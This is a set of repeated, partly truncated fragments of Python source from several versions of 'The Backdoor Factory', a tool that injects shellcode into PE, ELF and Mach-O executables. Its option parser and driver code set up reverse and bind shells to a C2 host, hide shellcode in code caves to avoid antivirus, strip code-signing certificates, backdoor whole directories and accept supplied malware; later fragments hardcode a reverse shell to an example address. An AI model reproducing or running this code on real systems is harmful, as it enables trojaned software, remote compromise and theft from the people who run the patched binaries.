continue else: print("[*] File {0} is in backdoored " "directory".format(supported_file.FILE)) except Exception as e: print "DIR ERROR", str(e) else: print("Goodbye") sys.exit() if options.INJECTOR is True: supported_file = pebin( options.FILE, options.OUTPUT, options.SHELL, options.NSECTION, options.DISK_OFFSET, options.ADD_SECTION, options.CAVE_JUMPING, options.PORT, options.HOST, options.SUPPLIED_SHELLCODE, options.INJECTOR, options.CHANGE_ACCESS, options.VERBOSE, options.SUPPORT_CHECK, options.SHELL_LEN, options.FIND_CAVES, options.SUFFIX, options.DELETE_ORIGINAL, options.IMAGE_TYPE, options.ZERO_CERT, options.CHECK_ADMIN, options.PATCH_DLL) supported_file.injector() sys.exit() if not options.FILE: parser.print_help() sys.exit() #OUTPUT = output_options(options.FILE, options.OUTPUT) is_supported = basicDiscovery(options.FILE) if is_supported is "PE": supported_file = pebin( options.FILE, options.OUTPUT, options.SHELL, options.NSECTION,
class bdfMain(): version = """\ 2.2.1 """ author = """\ Author: Joshua Pitts Email: the.midnite.runr[a t]gmail<d o t>com Twitter: @midnite_runr """ #ASCII ART menu = [ "-.(`-') (`-') _ <-" ".(`-') _(`-') (`-')\n" "__( OO) (OO ).-/ _ __( OO)" "( (OO ).-> .-> .-> <-.(OO ) \n" "'-'---.\ / ,---. \-,-----.'-'. ,--" ".\ .'_ (`-')----. (`-')----. ,------,) \n" "| .-. (/ | \ /`.\ | .--./| .' /" "'`'-..__)( OO).-. '( OO).-. '| /`. ' \n" "| '-' `.) '-'|_.' | /_) (`-')| /)" "| | ' |( _) | | |( _) | | || |_.' | \n" "| /`'. |(| .-. | || |OO )| . ' |" " | / : \| |)| | \| |)| || . .' \n" "| '--' / | | | |(_' '--'\| |\ \|" " '-' / ' '-' ' ' '-' '| |\ \ \n" "`------' `--' `--' `-----'`--' '--'" "`------' `-----' `-----' `--' '--' \n" " (`-') _ (`-') " " (`-') \n" " <-. (OO ).-/ _ ( OO).-> " " .-> <-.(OO ) .-> \n" "(`-')-----./ ,---. \-,-----./ '._" " (`-')----. ,------,) ,--.' ,-. \n" "(OO|(_\---'| \ /`.\ | .--./|'--...__)" "( OO).-. '| /`. '(`-')'.' / \n" " / | '--. '-'|_.' | /_) (`-')`--. .--'" "( _) | | || |_.' |(OO \ / \n" " \_) .--'(| .-. | || |OO ) | | " " \| |)| || . .' | / /) \n" " `| |_) | | | |(_' '--'\ | | " " ' '-' '| |\ \ `-/ /` \n" " `--' `--' `--' `-----' `--' " " `-----' `--' '--' `--' \n", "__________ " " __ .___ \n" "\______ \_____ ____ " "| | __ __| _/____ ___________ \n" " | | _/\__ \ _/ ___\|" " |/ // __ |/ _ \ / _ \_ __ \ \n" " | | \ / __ \\\\ \__" "_| </ /_/ ( <_> | <_> ) | \/\n" " |______ /(____ /\___ >" "__|_ \____ |\____/ \____/|__| \n" " \/ \/ \/" " \/ \/ \n" "___________ " "__ \n" "\_ _____/____ _____/" " |_ ___________ ___.__. \n" " | __) \__ \ _/ ___\ " " __\/ _ \_ __ < | | \n" " | \ / __ \\\\ \__" "_| | ( <_> ) | \/\___ | \n" " \___ / (____ /\___ >_" "_| \____/|__| / ____| \n" " \/ \/ \/ " " \/ \n" ] signal.signal(signal.SIGINT, signal_handler) parser = OptionParser() parser.add_option("-f", "--file", dest="FILE", action="store", type="string", help="File to backdoor") parser.add_option("-s", "--shell", default="show", dest="SHELL", action="store", type="string", help="Payloads that are available for use." " Use 'show' to see payloads.") parser.add_option("-H", "--hostip", default=None, dest="HOST", action="store", type="string", help="IP of the C2 for reverse connections.") parser.add_option("-P", "--port", default=None, dest="PORT", action="store", type="int", help="The port to either connect back to for reverse " "shells or to listen on for bind shells") parser.add_option("-J", "--cave_jumping", dest="CAVE_JUMPING", default=False, action="store_true", help="Select this options if you want to use code cave" " jumping to further hide your shellcode in the binary.") parser.add_option("-a", "--add_new_section", default=False, dest="ADD_SECTION", action="store_true", help="Mandating that a new section be added to the " "exe (better success) but less av avoidance") parser.add_option("-U", "--user_shellcode", default=None, dest="SUPPLIED_SHELLCODE", action="store", help="User supplied shellcode, make sure that it matches" " the architecture that you are targeting.") parser.add_option("-c", "--cave", default=False, dest="FIND_CAVES", action="store_true", help="The cave flag will find code caves that " "can be used for stashing shellcode. " "This will print to all the code caves " "of a specific size." "The -l flag can be use with this setting.") parser.add_option("-l", "--shell_length", default=380, dest="SHELL_LEN", action="store", type="int", help="For use with -c to help find code " "caves of different sizes") parser.add_option("-o", "--output-file", default=None, dest="OUTPUT", action="store", type="string", help="The backdoor output file") parser.add_option("-n", "--section", default="sdata", dest="NSECTION", action="store", type="string", help="New section name must be " "less than seven characters") parser.add_option("-d", "--directory", dest="DIR", action="store", type="string", help="This is the location of the files that " "you want to backdoor. " "You can make a directory of file backdooring faster by " "forcing the attaching of a codecave " "to the exe by using the -a setting.") parser.add_option("-w", "--change_access", default=True, dest="CHANGE_ACCESS", action="store_false", help="This flag changes the section that houses " "the codecave to RWE. Sometimes this is necessary. " "Enabled by default. If disabled, the " "backdoor may fail.") parser.add_option("-i", "--injector", default=False, dest="INJECTOR", action="store_true", help="This command turns the backdoor factory in a " "hunt and shellcode inject type of mechinism. Edit " "the target settings in the injector module.") parser.add_option("-u", "--suffix", default=".old", dest="SUFFIX", action="store", type="string", help="For use with injector, places a suffix" " on the original file for easy recovery") parser.add_option("-D", "--delete_original", dest="DELETE_ORIGINAL", default=False, action="store_true", help="For use with injector module. This command" " deletes the original file. Not for use in production " "systems. *Author not responsible for stupid uses.*") parser.add_option("-O", "--disk_offset", dest="DISK_OFFSET", default=0, type="int", action="store", help="Starting point on disk offset, in bytes. " "Some authors want to obfuscate their on disk offset " "to avoid reverse engineering, if you find one of those " "files use this flag, after you find the offset.") parser.add_option("-S", "--support_check", dest="SUPPORT_CHECK", default=False, action="store_true", help="To determine if the file is supported by BDF prior" " to backdooring the file. For use by itself or with " "verbose. This check happens automatically if the " "backdooring is attempted.") parser.add_option( "-M", "--cave-miner", dest="CAVE_MINER", default=False, action="store_true", help= "Future use, to help determine smallest shellcode possible in a PE file" ) parser.add_option("-q", "--no_banner", dest="NO_BANNER", default=False, action="store_true", help="Kills the banner.") parser.add_option("-v", "--verbose", default=False, dest="VERBOSE", action="store_true", help="For debug information output.") parser.add_option("-T", "--image-type", dest="IMAGE_TYPE", default="ALL", type='string', action="store", help="ALL, x86, or x64 type binaries only. Default=ALL") parser.add_option( "-Z", "--zero_cert", dest="ZERO_CERT", default=True, action="store_false", help= "Allows for the overwriting of the pointer to the PE certificate table" " effectively removing the certificate from the binary for all intents" " and purposes.") parser.add_option( "-R", "--runas_admin", dest="CHECK_ADMIN", default=False, action="store_true", help= "Checks the PE binaries for \'requestedExecutionLevel level=\"highestAvailable\"\'" ". If this string is included in the binary, it must run as system/admin. Doing this " "slows patching speed significantly.") parser.add_option( "-L", "--patch_dll", dest="PATCH_DLL", default=True, action="store_false", help= "Use this setting if you DON'T want to patch DLLs. Patches by default." ) (options, args) = parser.parse_args() def basicDiscovery(FILE): testBinary = open(FILE, 'rb') header = testBinary.read(4) testBinary.close() if 'MZ' in header: return 'PE' elif 'ELF' in header: return 'ELF' else: 'Only support ELF and PE file formats' return None if options.NO_BANNER is False: print choice(menu) print author print version time.sleep(1) if options.DIR: for root, subFolders, files in os.walk(options.DIR): for _file in files: options.FILE = os.path.join(root, _file) if os.path.isdir(options.FILE) is True: print "Directory found, continuing" continue is_supported = basicDiscovery(options.FILE) if is_supported is "PE": supported_file = pebin( options.FILE, options.OUTPUT, options.SHELL, options.NSECTION, options.DISK_OFFSET, options.ADD_SECTION, options.CAVE_JUMPING, options.PORT, options.HOST, options.SUPPLIED_SHELLCODE, options.INJECTOR, options.CHANGE_ACCESS, options.VERBOSE, options.SUPPORT_CHECK, options.SHELL_LEN, options.FIND_CAVES, options.SUFFIX, options.DELETE_ORIGINAL, options.CAVE_MINER, options.IMAGE_TYPE, options.ZERO_CERT, options.CHECK_ADMIN, options.PATCH_DLL) elif is_supported is "ELF": supported_file = elfbin( options.FILE, options.OUTPUT, options.SHELL, options.HOST, options.PORT, options.SUPPORT_CHECK, options.FIND_CAVES, options.SHELL_LEN, options.SUPPLIED_SHELLCODE, options.IMAGE_TYPE) if options.SUPPORT_CHECK is True: if os.path.isfile(options.FILE): is_supported = False print "file", options.FILE try: is_supported = supported_file.support_check() except Exception, e: is_supported = False print 'Exception:', str(e), '%s' % options.FILE if is_supported is False or is_supported is None: print "%s is not supported." % options.FILE #continue else: print "%s is supported." % options.FILE # if supported_file.flItms['runas_admin'] is True: # print "%s must be run as admin." % options.FILE print "*" * 50 if options.SUPPORT_CHECK is True: sys.exit() print( "You are going to backdoor the following " "items in the %s directory:" % options.DIR) dirlisting = os.listdir(options.DIR) for item in dirlisting: print " {0}".format(item) answer = raw_input("Do you want to continue? (yes/no) ") if 'yes' in answer.lower(): for item in dirlisting: #print item print "*" * 50 options.File = options.DIR + '/' + item if os.path.isdir(options.FILE) is True: print "Directory found, continuing" continue print("backdooring file %s" % item) result = None is_supported = basicDiscovery(options.FILE) try: if is_supported is "PE": supported_file = pebin( options.FILE, options.OUTPUT, options.SHELL, options.NSECTION, options.DISK_OFFSET, options.ADD_SECTION, options.CAVE_JUMPING, options.PORT, options.HOST, options.SUPPLIED_SHELLCODE, options.INJECTOR, options.CHANGE_ACCESS, options.VERBOSE, options.SUPPORT_CHECK, options.SHELL_LEN, options.FIND_CAVES, options.SUFFIX, options.DELETE_ORIGINAL, options.CAVE_MINER, options.IMAGE_TYPE, options.ZERO_CERT, options.CHECK_ADMIN, options.PATCH_DLL) supported_file.OUTPUT = None supported_file.output_options() result = supported_file.patch_pe() elif is_supported is "ELF": supported_file = elfbin( options.FILE, options.OUTPUT, options.SHELL, options.HOST, options.PORT, options.SUPPORT_CHECK, options.FIND_CAVES, options.SHELL_LEN, options.SUPPLIED_SHELLCODE, options.IMAGE_TYPE) supported_file.OUTPUT = None supported_file.output_options() result = supported_file.patch_elf() if result is None: print 'Not Supported. Continuing' continue else: print("[*] File {0} is in backdoored " "directory".format(supported_file.FILE)) except Exception as e: print "DIR ERROR", str(e) else: print("Goodbye") sys.exit()
if len(sys.argv) != 4: print "Will create patched binaries for each stock shellcode/payload for the " print "type of binary provided. Each payload type has it's own port number." print "Usage:" + str(sys.argv[0]) + " binary HOST PORT" sys.exit() file = sys.argv[1] host = sys.argv[2] port = int(sys.argv[3]) outputfiles = {} is_supported = basicDiscovery(file) if is_supported is "PE": patchtypes = ['APPEND', 'JUMP', 'SINGLE'] supported_file = pebin.pebin(FILE=file, OUTPUT=None, SHELL='none') supported_file.run_this() #print supported_file.flItms['avail_shells'] for aShell in supported_file.flItms['avail_shells']: for patchtype in patchtypes: if 'cave_miner' in aShell or 'user_supplied' in aShell: continue aName = aShell + "." + patchtype + "." + str(host) + "." + str( port) + "." + file print "Creating File:", aName if patchtype == 'APPEND': supported_file = pebin.pebin(FILE=file, OUTPUT=aName, SHELL=aShell, HOST=host, PORT=port,
sys.exit() if options.INJECTOR is True: supported_file = pebin(options.FILE, options.OUTPUT, options.SHELL, options.NSECTION, options.DISK_OFFSET, options.ADD_SECTION, options.CAVE_JUMPING, options.PORT, options.HOST, options.SUPPLIED_SHELLCODE, options.INJECTOR, options.CHANGE_ACCESS, options.VERBOSE, options.SUPPORT_CHECK, options.SHELL_LEN, options.FIND_CAVES, options.SUFFIX, options.DELETE_ORIGINAL, options.IMAGE_TYPE, options.ZERO_CERT, options.CHECK_ADMIN, options.PATCH_DLL, options.PATCH_METHOD ) supported_file.injector() sys.exit() if not options.FILE:
if len(sys.argv) != 4: print "Will create patched binaries for each stock shellcode/payload for the " print "type of binary provided. Each payload type has it's own port number." print "Usage:" + str(sys.argv[0]) + " binary HOST PORT" sys.exit() file = sys.argv[1] host = sys.argv[2] port = int(sys.argv[3]) outputfiles = {} is_supported = basicDiscovery(file) if is_supported is "PE": patchtypes = ['APPEND', 'JUMP', 'SINGLE'] supported_file = pebin.pebin(FILE=file, OUTPUT=None, SHELL='none') supported_file.run_this() #print supported_file.flItms['avail_shells'] for aShell in supported_file.flItms['avail_shells']: for patchtype in patchtypes: if 'cave_miner' in aShell or 'user_supplied' in aShell: continue aName = aShell + "." + patchtype + "." + str(host) + "." + str(port) + "." + file print "Creating File:", aName if patchtype == 'APPEND': supported_file = pebin.pebin(FILE=file, OUTPUT=aName, SHELL=aShell, HOST=host, PORT=port, ADD_SECTION=True) elif patchtype == 'JUMP': supported_file = pebin.pebin(FILE=file, OUTPUT=aName,
print "DIR ERROR",str(e) else: print("Goodbye") sys.exit() if options.INJECTOR is True: supported_file = pebin(options.FILE, options.OUTPUT, options.SHELL, options.NSECTION, options.DISK_OFFSET, options.ADD_SECTION, options.CAVE_JUMPING, options.PORT, options.HOST, options.SUPPLIED_SHELLCODE, options.INJECTOR, options.CHANGE_ACCESS, options.VERBOSE, options.SUPPORT_CHECK, options.SHELL_LEN, options.FIND_CAVES, options.SUFFIX, options.DELETE_ORIGINAL) supported_file.injector() sys.exit() if not options.FILE: parser.print_help() sys.exit()
class bdfMain(): version = """\ Version: 3.4.2 """ author = """\ !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! ALERT: NEW VERSION IN DEVELOPMENT *** ONLY AVAILABLE TO SPONSORS *** SPONSOR THE NEXT VERSION HERE: https://github.com/sponsors/secretsquirrel Author: Joshua Pitts Email: the.midnite.runr[-at ]gmail<d o-t>com Twitter: @ausernamedjosh SPONSOR THE NEXT VERSION HERE: https://github.com/sponsors/secretsquirrel !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! """ #ASCII ART menu = [ "-.(`-') (`-') _ <-" ".(`-') _(`-') (`-')\n" "__( OO) (OO ).-/ _ __( OO)" "( (OO ).-> .-> .-> <-.(OO ) \n" "'-'---.\ / ,---. \-,-----.'-'. ,--" ".\ .'_ (`-')----. (`-')----. ,------,) \n" "| .-. (/ | \ /`.\ | .--./| .' /" "'`'-..__)( OO).-. '( OO).-. '| /`. ' \n" "| '-' `.) '-'|_.' | /_) (`-')| /)" "| | ' |( _) | | |( _) | | || |_.' | \n" "| /`'. |(| .-. | || |OO )| . ' |" " | / : \| |)| | \| |)| || . .' \n" "| '--' / | | | |(_' '--'\| |\ \|" " '-' / ' '-' ' ' '-' '| |\ \ \n" "`------' `--' `--' `-----'`--' '--'" "`------' `-----' `-----' `--' '--' \n" " (`-') _ (`-') " " (`-') \n" " <-. (OO ).-/ _ ( OO).-> " " .-> <-.(OO ) .-> \n" "(`-')-----./ ,---. \-,-----./ '._" " (`-')----. ,------,) ,--.' ,-. \n" "(OO|(_\---'| \ /`.\ | .--./|'--...__)" "( OO).-. '| /`. '(`-')'.' / \n" " / | '--. '-'|_.' | /_) (`-')`--. .--'" "( _) | | || |_.' |(OO \ / \n" " \_) .--'(| .-. | || |OO ) | | " " \| |)| || . .' | / /) \n" " `| |_) | | | |(_' '--'\ | | " " ' '-' '| |\ \ `-/ /` \n" " `--' `--' `--' `-----' `--' " " `-----' `--' '--' `--' \n", "__________ " " __ .___ \n" "\______ \_____ ____ " "| | __ __| _/____ ___________ \n" " | | _/\__ \ _/ ___\|" " |/ // __ |/ _ \ / _ \_ __ \ \n" " | | \ / __ \\\\ \__" "_| </ /_/ ( <_> | <_> ) | \/\n" " |______ /(____ /\___ >" "__|_ \____ |\____/ \____/|__| \n" " \/ \/ \/" " \/ \/ \n" "___________ " "__ \n" "\_ _____/____ _____/" " |_ ___________ ___.__. \n" " | __) \__ \ _/ ___\ " " __\/ _ \_ __ < | | \n" " | \ / __ \\\\ \__" "_| | ( <_> ) | \/\___ | \n" " \___ / (____ /\___ >_" "_| \____/|__| / ____| \n" " \/ \/ \/ " " \/ \n", " ____ ____ ______ " " __ \n" " / __ )/ __ \/ ____/___ " "______/ /_____ _______ __\n" " / __ / / / / /_ / __ `/" " ___/ __/ __ \/ ___/ / / /\n" " / /_/ / /_/ / __/ / /_/ /" " /__/ /_/ /_/ / / / /_/ /\n" "/_____/_____/_/ \__,_/" "\___/\__/\____/_/ \__, /\n" " " " /____/\n" ] signal.signal(signal.SIGINT, signal_handler) parser = OptionParser() parser.add_option("-f", "--file", dest="FILE", action="store", type="string", help="File to backdoor") parser.add_option("-s", "--shell", default="show", dest="SHELL", action="store", type="string", help="Payloads that are available for use." " Use 'show' to see payloads.") parser.add_option("-H", "--hostip", default=None, dest="HOST", action="store", type="string", help="IP of the C2 for reverse connections.") parser.add_option("-P", "--port", default=None, dest="PORT", action="store", type="int", help="The port to either connect back to for reverse " "shells or to listen on for bind shells") parser.add_option("-J", "--cave_jumping", dest="CAVE_JUMPING", default=False, action="store_true", help="Select this options if you want to use code cave" " jumping to further hide your shellcode in the binary.") parser.add_option("-a", "--add_new_section", default=False, dest="ADD_SECTION", action="store_true", help="Mandating that a new section be added to the " "exe (better success) but less av avoidance") parser.add_option("-U", "--user_shellcode", default=None, dest="SUPPLIED_SHELLCODE", action="store", help="User supplied shellcode, make sure that it matches" " the architecture that you are targeting.") parser.add_option("-c", "--cave", default=False, dest="FIND_CAVES", action="store_true", help="The cave flag will find code caves that " "can be used for stashing shellcode. " "This will print to all the code caves " "of a specific size." "The -l flag can be use with this setting.") parser.add_option("-l", "--shell_length", default=380, dest="SHELL_LEN", action="store", type="int", help="For use with -c to help find code " "caves of different sizes") parser.add_option("-o", "--output-file", default=None, dest="OUTPUT", action="store", type="string", help="The backdoor output file") parser.add_option("-n", "--section", default="sdata", dest="NSECTION", action="store", type="string", help="New section name must be " "less than seven characters") parser.add_option("-d", "--directory", dest="DIR", action="store", type="string", help="This is the location of the files that " "you want to backdoor. " "You can make a directory of file backdooring faster by " "forcing the attaching of a codecave " "to the exe by using the -a setting.") parser.add_option("-w", "--change_access", default=True, dest="CHANGE_ACCESS", action="store_false", help="This flag changes the section that houses " "the codecave to RWE. Sometimes this is necessary. " "Enabled by default. If disabled, the " "backdoor may fail.") parser.add_option("-i", "--injector", default=False, dest="INJECTOR", action="store_true", help="This command turns the backdoor factory in a " "hunt and shellcode inject type of mechanism. Edit " "the target settings in the injector module.") parser.add_option("-u", "--suffix", default=".old", dest="SUFFIX", action="store", type="string", help="For use with injector, places a suffix" " on the original file for easy recovery") parser.add_option("-D", "--delete_original", dest="DELETE_ORIGINAL", default=False, action="store_true", help="For use with injector module. This command" " deletes the original file. Not for use in production " "systems. *Author not responsible for stupid uses.*") parser.add_option("-O", "--disk_offset", dest="DISK_OFFSET", default=0, type="int", action="store", help="Starting point on disk offset, in bytes. " "Some authors want to obfuscate their on disk offset " "to avoid reverse engineering, if you find one of those " "files use this flag, after you find the offset.") parser.add_option("-S", "--support_check", dest="SUPPORT_CHECK", default=False, action="store_true", help="To determine if the file is supported by BDF prior" " to backdooring the file. For use by itself or with " "verbose. This check happens automatically if the " "backdooring is attempted.") parser.add_option( "-M", "--cave-miner", dest="CAVE_MINER", default=False, action="store_true", help= "Future use, to help determine smallest shellcode possible in a PE file" ) parser.add_option("-q", "--no_banner", dest="NO_BANNER", default=False, action="store_true", help="Kills the banner.") parser.add_option("-v", "--verbose", default=False, dest="VERBOSE", action="store_true", help="For debug information output.") parser.add_option("-T", "--image-type", dest="IMAGE_TYPE", default="ALL", type='string', action="store", help="ALL, x86, or x64 type binaries only. Default=ALL") parser.add_option( "-Z", "--zero_cert", dest="ZERO_CERT", default=True, action="store_false", help= "Allows for the overwriting of the pointer to the PE certificate table" " effectively removing the certificate from the binary for all intents" " and purposes.") parser.add_option( "-R", "--runas_admin", dest="RUNAS_ADMIN", default=False, action="store_true", help="EXPERIMENTAL " "Checks the PE binaries for \'requestedExecutionLevel level=\"highestAvailable\"\'" ". If this string is included in the binary, it must run as system/admin. If not " "in Support Check mode it will attmept to patch highestAvailable into the manifest " "if requestedExecutionLevel entry exists.") parser.add_option( "-L", "--patch_dll", dest="PATCH_DLL", default=True, action="store_false", help= "Use this setting if you DON'T want to patch DLLs. Patches by default." ) parser.add_option( "-F", "--fat_priority", dest="FAT_PRIORITY", default="x64", action="store", help= "For MACH-O format. If fat file, focus on which arch to patch. Default " "is x64. To force x86 use -F x86, to force both archs use -F ALL.") parser.add_option( "-B", "--beacon", dest="BEACON", default=15, action="store", type="int", help= "For payloads that have the ability to beacon out, set the time in secs" ) parser.add_option( "-m", "--patch-method", dest="PATCH_METHOD", default="manual", action="store", type="string", help="Patching methods for PE files, 'manual','automatic', replace " "and onionduke") parser.add_option("-b", "--user_malware", dest="SUPPLIED_BINARY", default=None, action="store", help="For onionduke. Provide your desired binary.") parser.add_option( "-X", "--xp_mode", dest="XP_MODE", default=False, action="store_true", help= "Default: DO NOT support for XP legacy machines, use -X to support XP" ". By default the binary will crash on XP machines (e.g. sandboxes)") parser.add_option( "-A", "--idt_in_cave", dest="IDT_IN_CAVE", default=False, action="store_true", help="EXPERIMENTAL " "By default a new Import Directory Table is created in a new section, " "by calling this flag it will be put in a code cave. This can cause binary " "failure is some cases. Test on target binaries first.") parser.add_option( "-C", "--code_sign", dest="CODE_SIGN", default=False, action="store_true", help= "For those with codesigning certs wishing to sign PE binaries only. " "Name your signing key and private key signingcert.cer and signingPrivateKey.pem " "repectively in the certs directory it's up to you to obtain signing certs." ) parser.add_option( "-p", "--preprocess", dest="PREPROCESS", default=False, action="store_true", help="To execute preprocessing scripts in the preprocess directory") (options, args) = parser.parse_args() def basicDiscovery(FILE): macho_supported = [ '\xcf\xfa\xed\xfe', '\xca\xfe\xba\xbe', '\xce\xfa\xed\xfe', ] testBinary = open(FILE, 'rb') header = testBinary.read(4) testBinary.close() if 'MZ' in header: return 'PE' elif 'ELF' in header: return 'ELF' elif header in macho_supported: return "MACHO" else: 'Only support ELF, PE, and MACH-O file formats' return None if options.NO_BANNER is False: print choice(menu) print author print version time.sleep(.5) else: print "\t Backdoor Factory" print author print version if options.DIR: for root, subFolders, files in os.walk(options.DIR): for _file in files: options.FILE = os.path.join(root, _file) if os.path.isdir(options.FILE) is True: print "Directory found, continuing" continue is_supported = basicDiscovery(options.FILE) if is_supported is "PE": supported_file = pebin( options.FILE, options.OUTPUT, options.SHELL, options.NSECTION, options.DISK_OFFSET, options.ADD_SECTION, options.CAVE_JUMPING, options.PORT, options.HOST, options.SUPPLIED_SHELLCODE, options.INJECTOR, options.CHANGE_ACCESS, options.VERBOSE, options.SUPPORT_CHECK, options.SHELL_LEN, options.FIND_CAVES, options.SUFFIX, options.DELETE_ORIGINAL, options.CAVE_MINER, options.IMAGE_TYPE, options.ZERO_CERT, options.RUNAS_ADMIN, options.PATCH_DLL, options.PATCH_METHOD, options.SUPPLIED_BINARY, options.XP_MODE, options.IDT_IN_CAVE, options.CODE_SIGN, options.PREPROCESS, ) elif is_supported is "ELF": supported_file = elfbin( options.FILE, options.OUTPUT, options.SHELL, options.HOST, options.PORT, options.SUPPORT_CHECK, options.FIND_CAVES, options.SHELL_LEN, options.SUPPLIED_SHELLCODE, options.IMAGE_TYPE, options.PREPROCESS, ) elif is_supported is "MACHO": supported_file = machobin( options.FILE, options.OUTPUT, options.SHELL, options.HOST, options.PORT, options.SUPPORT_CHECK, options.SUPPLIED_SHELLCODE, options.FAT_PRIORITY, options.BEACON, options.PREPROCESS, ) if options.SUPPORT_CHECK is True: if os.path.isfile(options.FILE): is_supported = False print "file", options.FILE try: is_supported = supported_file.support_check() except Exception, e: is_supported = False print 'Exception:', str(e), '%s' % options.FILE if is_supported is False or is_supported is None: print "%s is not supported." % options.FILE #continue else: print "%s is supported." % options.FILE # if supported_file.flItms['runas_admin'] is True: # print "%s must be run as admin." % options.FILE print "*" * 50 if options.SUPPORT_CHECK is True: sys.exit() print( "You are going to backdoor the following " "items in the %s directory:" % options.DIR) dirlisting = os.listdir(options.DIR) for item in dirlisting: print " {0}".format(item) answer = raw_input("Do you want to continue? (yes/no) ") if 'yes' in answer.lower(): for item in dirlisting: #print item print "*" * 50 options.File = options.DIR + '/' + item if os.path.isdir(options.FILE) is True: print "Directory found, continuing" continue print("backdooring file %s" % item) result = None is_supported = basicDiscovery(options.FILE) try: if is_supported is "PE": supported_file = pebin( options.FILE, options.OUTPUT, options.SHELL, options.NSECTION, options.DISK_OFFSET, options.ADD_SECTION, options.CAVE_JUMPING, options.PORT, options.HOST, options.SUPPLIED_SHELLCODE, options.INJECTOR, options.CHANGE_ACCESS, options.VERBOSE, options.SUPPORT_CHECK, options.SHELL_LEN, options.FIND_CAVES, options.SUFFIX, options.DELETE_ORIGINAL, options.CAVE_MINER, options.IMAGE_TYPE, options.ZERO_CERT, options.RUNAS_ADMIN, options.PATCH_DLL, options.PATCH_METHOD, options.SUPPLIED_BINARY, options.XP_MODE, options.IDT_IN_CAVE, options.CODE_SIGN, options.PREPROCESS, ) supported_file.OUTPUT = None supported_file.output_options() result = supported_file.patch_pe() elif is_supported is "ELF": supported_file = elfbin( options.FILE, options.OUTPUT, options.SHELL, options.HOST, options.PORT, options.SUPPORT_CHECK, options.FIND_CAVES, options.SHELL_LEN, options.SUPPLIED_SHELLCODE, options.IMAGE_TYPE, options.PREPROCESS, ) supported_file.OUTPUT = None supported_file.output_options() result = supported_file.patch_elf() elif is_supported is "MACHO": supported_file = machobin( options.FILE, options.OUTPUT, options.SHELL, options.HOST, options.PORT, options.SUPPORT_CHECK, options.SUPPLIED_SHELLCODE, options.FAT_PRIORITY, options.BEACON, options.PREPROCESS, ) supported_file.OUTPUT = None supported_file.output_options() result = supported_file.patch_macho() if result is None: print 'Not Supported. Continuing' continue else: print("[*] File {0} is in backdoored " "directory".format(supported_file.FILE)) except Exception as e: print "DIR ERROR", str(e) else: print("Goodbye") sys.exit()
def patch(self): if self.choice is "PE": supported_file = pebin(self.FILE, #options.FILE None, #options.OUTPUT "reverse_shell_tcp_inline", #options.SHELL "sdata", #options.NSECTION 0, #options.DISK_OFFSET False, #options.ADD_SECTION False, #options.CAVE_JUMPING self.PORT, #options.PORT self.HOST, #options.HOST None, #options.SUPPLIED_SHELLCODE False, #options.INJECTOR True, #options.CHANGE_ACCESS False, #options.VERBOSE False, #options.SUPPORT_CHECK 380, #options.SHELL_LEN False, #options.FIND_CAVES ".old", #options.SUFFIX False, #options.DELETE_ORIGINAL False, #options.CAVE_MINER "ALL", #options.IMAGE_TYPE True, #options.ZERO_CERT False, #options.RUNAS_ADMIN True, #options.PATCH_DLL "automatic", #options.PATCH_METHOD None, #options.SUPPLIED_BINARY False, #options.XP_MODE False, #options.IDT_IN_CAVE False, #options.CODE_SIGN ) elif self.choice is "ELF": supported_file = elfbin(self.FILE, None, "REVERSESHELLNAME", self.HOST, self.PORT, False, False, options.SHELL_LEN, #I must learn this None, "ALL" ) elif self.choice is "MACHO": supported_file = machobin(self.FILE, None, "REVERSESHELLNAME", self.HOST, self.PORT, False, None, options.FAT_PRIORITY, #Special settings for macho files options.BEACON ) print ("\n\n") result = supported_file.run_this() print ("File {0} created !\n\n".format(supported_file.OUTPUT)) #start("PE", "Handle.exe", "192.168.1.34", 4444).patch() #start("ELF", "Handle.exe", "192.168.1.34", "4444").patch() #start("MACHO", "Handle.exe", "192.168.1.34", "4444").patch()
def patch(self): if self.choice is "PE": supported_file = pebin( self.FILE, #options.FILE None, #options.OUTPUT "reverse_shell_tcp_inline", #options.SHELL "sdata", #options.NSECTION 0, #options.DISK_OFFSET False, #options.ADD_SECTION False, #options.CAVE_JUMPING self.PORT, #options.PORT self.HOST, #options.HOST None, #options.SUPPLIED_SHELLCODE False, #options.INJECTOR True, #options.CHANGE_ACCESS False, #options.VERBOSE False, #options.SUPPORT_CHECK 380, #options.SHELL_LEN False, #options.FIND_CAVES ".old", #options.SUFFIX False, #options.DELETE_ORIGINAL False, #options.CAVE_MINER "ALL", #options.IMAGE_TYPE True, #options.ZERO_CERT False, #options.RUNAS_ADMIN True, #options.PATCH_DLL "automatic", #options.PATCH_METHOD None, #options.SUPPLIED_BINARY False, #options.XP_MODE False, #options.IDT_IN_CAVE False, #options.CODE_SIGN ) elif self.choice is "ELF": supported_file = elfbin( self.FILE, None, "REVERSESHELLNAME", self.HOST, self.PORT, False, False, options.SHELL_LEN, #I must learn this None, "ALL") elif self.choice is "MACHO": supported_file = machobin( self.FILE, None, "REVERSESHELLNAME", self.HOST, self.PORT, False, None, options.FAT_PRIORITY, #Special settings for macho files options.BEACON) print("\n\n") result = supported_file.run_this() print("File {0} created !\n\n".format(supported_file.OUTPUT)) #start("PE", "Handle.exe", "192.168.1.34", 4444).patch() #start("ELF", "Handle.exe", "192.168.1.34", "4444").patch() #start("MACHO", "Handle.exe", "192.168.1.34", "4444").patch()